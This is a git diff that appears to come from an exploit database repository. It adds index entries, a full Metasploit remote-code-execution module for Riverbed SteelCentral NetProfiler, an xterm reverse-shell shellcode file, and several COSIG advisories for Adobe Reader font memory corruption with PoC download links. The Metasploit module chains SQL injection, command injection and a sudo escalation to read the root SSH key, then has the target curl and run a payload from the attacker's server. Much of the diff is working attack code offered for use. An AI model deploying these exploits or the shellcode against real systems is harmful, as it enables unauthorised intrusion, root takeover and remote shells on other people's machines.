diff --git a/files.csv b/files.csv index de78f331c..c909d51b3 100755 --- a/files.csv +++ b/files.csv @@ -11736,6 +11736,7 @@ id,file,description,date,author,platform,type,port 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 +40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption",2016-07-13,COSIG,multiple,dos,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 @@ -30539,6 +30540,9 @@ id,file,description,date,author,platform,type,port 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 +40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0 +40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 +40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0 @@ -31574,6 +31578,11 @@ id,file,description,date,author,platform,type,port 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 +40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0 +40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0 +40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0 +40102,platforms/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos,0 +40103,platforms/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos,0 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 @@ -35271,6 +35280,8 @@ id,file,description,date,author,platform,type,port 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 +40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0 +40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0 39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0 @@ -35919,6 +35930,7 @@ id,file,description,date,author,platform,type,port 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 +40094,platforms/win32/shellcode/40094.c,"Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode",2016-07-13,"Roziul Hasan Khan Shifat",win32,shellcode,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 @@ -36256,3 +36268,8 @@ id,file,description,date,author,platform,type,port 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0 +40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 +40107,platforms/windows/local/40107.rb,"MS16-032 Secondary Logon Handle Privilege Escalation",2016-07-13,metasploit,windows,local,0 +40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,metasploit,linux,remote,443 +40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 +40110,platforms/lin_x86/shellcode/40110.c,"Linux x86 Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10",2016-07-13,RTV,lin_x86,shellcode,0 diff --git a/platforms/lin_x86/shellcode/40110.c b/platforms/lin_x86/shellcode/40110.c new file mode 100755 index 000000000..67397b1a3 --- /dev/null +++ b/platforms/lin_x86/shellcode/40110.c @@ -0,0 +1,78 @@ +/* + # Title : Linux , Reverse Shell using Xterm , ///usr/bin/xterm -display 127.1.1.1:10 + # Date : 12-07-2016 + # Author : RTV + # Tested On : Ubuntu x86 + # shellcode : \x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80 +*/ +/* +;********************************** +;xterm.asm +;xterm reverse shell , 32 bit Linux +;nasm -f elf32 -o xterm.o xterm.asm && ld -o xtermrev xterm.o +;Shellcode length 68 + + +section .text + global _start +_start: +xor eax,eax +xor edx,edx +push eax +push 0x30313a31 ; setting the listening IP and display , used 127.1.1.1:10 , change this section to set your IP +push 0x2e312e31 +push 0x2e373231 +mov esi,esp +push eax +push 0x79616c70 ; -display +push 0x7369642d +mov edi,esp +push eax +push 0x6d726574 ; ///usr/bin/xterm +push 0x782f6e69 +push 0x622f7273 +push 0x752f2f2f +mov ebx,esp +push eax +push esi +push edi +push ebx +mov ecx,esp +mov al,11 +int 0x80 + +;********************************** + +/** shellcode.c , gcc -fno-stack-protector -z execstack -o xtermrev shellcode.c + +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} + +/*************************** + +Notes : - + +Xterm reverse shell + +Use these commands to listen at your side + +Xnest :10 ( starting Xserver with display 10) +xhost +targetip ( authorize the target ip to connect back) + +# SLAE - 739 +*/ \ No newline at end of file diff --git a/platforms/linux/remote/40108.rb b/platforms/linux/remote/40108.rb new file mode 100755 index 000000000..711d2c260 --- /dev/null +++ b/platforms/linux/remote/40108.rb @@ -0,0 +1,318 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + require 'digest' + + def initialize(info={}) + super(update_info(info, + 'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution", + 'Description' => %q{ + This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress + virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form + can be exploited to add a malicious user into the application's database. An attacker can then exploit a + command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure + configuration of the sudoers file can be abused to escalate privileges to root. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Francesco Oddo ' ], + 'References' => + [ + [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ] + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + [ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }] + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Privileged' => false, + 'DisclosureDate' => "Jun 27 2016", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI', '/']), + OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']), + OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']), + OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]), + Opt::RPORT(443) + ], + self.class + ) + end + + def check + json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}"; + + # Verifies existence of login SQLi + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'), + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => json_payload_check + }) + + if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT') + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def exploit + + print_status("Attempting log in to target appliance") + @sessid = do_login + + print_status("Confirming command injection vulnerability") + test_cmd_inject + vprint_status('Ready to execute payload on appliance') + + @elf_sent = false + # Generate payload + @pl = generate_payload_exe + + if @pl.nil? + fail_with(Failure::BadConfig, 'Please select a valid Linux payload') + end + + # Start the server and use primer to trigger fetching and running of the payload + begin + Timeout.timeout(datastore['HTTPDELAY']) { super } + rescue Timeout::Error + end + + end + + def get_nonce + # Function to get nonce from login page + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'/index.php'), + }) + + if res && res.body && res.body.include?('nonce_') + html = res.get_html_document + nonce_field = html.at('input[@name="nonce"]') + nonce = nonce_field.attributes["value"] + else + fail_with(Failure::Unknown, 'Unable to get login nonce.') + end + + # needed as login nonce is bounded to preauth SESSID cookie + sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || '' + + return [nonce, sessid_cookie_preauth] + + end + + def do_login + + uname = datastore['RIVERBED_USER'] + passwd = datastore['RIVERBED_PASSWORD'] + + nonce, sessid_cookie_preauth = get_nonce + post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php'), + 'cookie' => "SESSID=#{sessid_cookie_preauth}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + + # Exploit login SQLi if credentials are not valid. + if res && res.body && res.body.include?('
'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php'), + 'cookie' => "SESSID=#{sessid_cookie_preauth}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + + sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || '' + print_status("Saving login credentials into Metasploit DB") + report_cred(uname, passwd) + else + print_status("Valid login credentials provided. Successfully logged in") + sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || '' + print_status("Saving login credentials into Metasploit DB") + report_cred(uname, passwd) + end + + return sessid_cookie + + end + + def report_cred(username, password) + # Function used to save login credentials into Metasploit database + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + username: username, + private_data: password, + private_type: :password + }.merge(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + }.merge(service_data) + + create_credential_login(login_data) + end + + def create_user + # Function exploiting login SQLi to create a malicious user + username = datastore['RIVERBED_USER'] + password = datastore['RIVERBED_PASSWORD'] + + usr_payload = generate_sqli_payload(username) + pwd_hash = Digest::SHA512.hexdigest(password) + pass_payload = generate_sqli_payload(pwd_hash) + uid = rand(999) + + json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}"; + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'), + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => json_payload_sqli + }) + + json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}"; + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'), + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => json_payload_checkuser + }) + + if res && res.body && res.body.include?('session_id') + print_status("User account successfully created, login credentials: '#{username}':'#{password}'") + else + fail_with(Failure::UnexpectedReply, 'Unable to add user to database') + end + + end + + def generate_sqli_payload(input) + # Function to generate sqli payload for user/pass in expected format + payload = '' + input_array = input.strip.split('') + for index in 0..input_array.length-1 + payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||' + end + + # Gets rid of the trailing '||' and newline + payload = payload[0..-3] + + return payload + end + + def test_cmd_inject + post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'), + 'cookie' => "SESSID=#{@sessid}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + + unless res && res.body.include?('uid=') + fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable') + end + + end + + def cmd_inject(cmd) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'), + 'cookie' => "SESSID=#{@sessid}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => cmd + }) + + end + + # Deliver payload to appliance and make it run it + def primer + + # Gets the autogenerated uri + payload_uri = get_uri + + root_ssh_key_private = rand_text_alpha_lower(8) + binary_payload = rand_text_alpha_lower(8) + + print_status("Privilege escalate to root and execute payload") + + privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'" + + cmd_inject(privesc_exec_cmd) + + register_file_for_cleanup("/tmp/#{root_ssh_key_private}") + register_file_for_cleanup("/tmp/#{binary_payload}") + + vprint_status('Finished primer hook, raising Timeout::Error manually') + raise(Timeout::Error) + end + + #Handle incoming requests from the server + def on_request_uri(cli, request) + vprint_status("on_request_uri called: #{request.inspect}") + print_status('Sending the payload to the server...') + @elf_sent = true + send_response(cli, @pl) + end + +end \ No newline at end of file diff --git a/platforms/multiple/dos/40095.txt b/platforms/multiple/dos/40095.txt new file mode 100755 index 000000000..49ebad8c4 --- /dev/null +++ b/platforms/multiple/dos/40095.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin and Pier-Luc Maltais of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4205 +# COSIG-2016-30 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40095.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40096.txt b/platforms/multiple/dos/40096.txt new file mode 100755 index 000000000..efd374b40 --- /dev/null +++ b/platforms/multiple/dos/40096.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin and Pier-Luc Maltais of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4204 +# COSIG-2016-29 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40096.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40097.txt b/platforms/multiple/dos/40097.txt new file mode 100755 index 000000000..8766b7ec1 --- /dev/null +++ b/platforms/multiple/dos/40097.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4203 +# COSIG-2016-28 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40097.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40098.txt b/platforms/multiple/dos/40098.txt new file mode 100755 index 000000000..3d1db4d63 --- /dev/null +++ b/platforms/multiple/dos/40098.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4208 +# COSIG-2016-27 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40098.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40099.txt b/platforms/multiple/dos/40099.txt new file mode 100755 index 000000000..7b0174c0f --- /dev/null +++ b/platforms/multiple/dos/40099.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4207 +# COSIG-2016-26 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40099.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40100.txt b/platforms/multiple/dos/40100.txt new file mode 100755 index 000000000..f92d6f6af --- /dev/null +++ b/platforms/multiple/dos/40100.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4206 +# COSIG-2016-25 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. + +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40100.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40101.txt b/platforms/multiple/dos/40101.txt new file mode 100755 index 000000000..113e3d03d --- /dev/null +++ b/platforms/multiple/dos/40101.txt @@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4201 +# COSIG-2016-24 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of 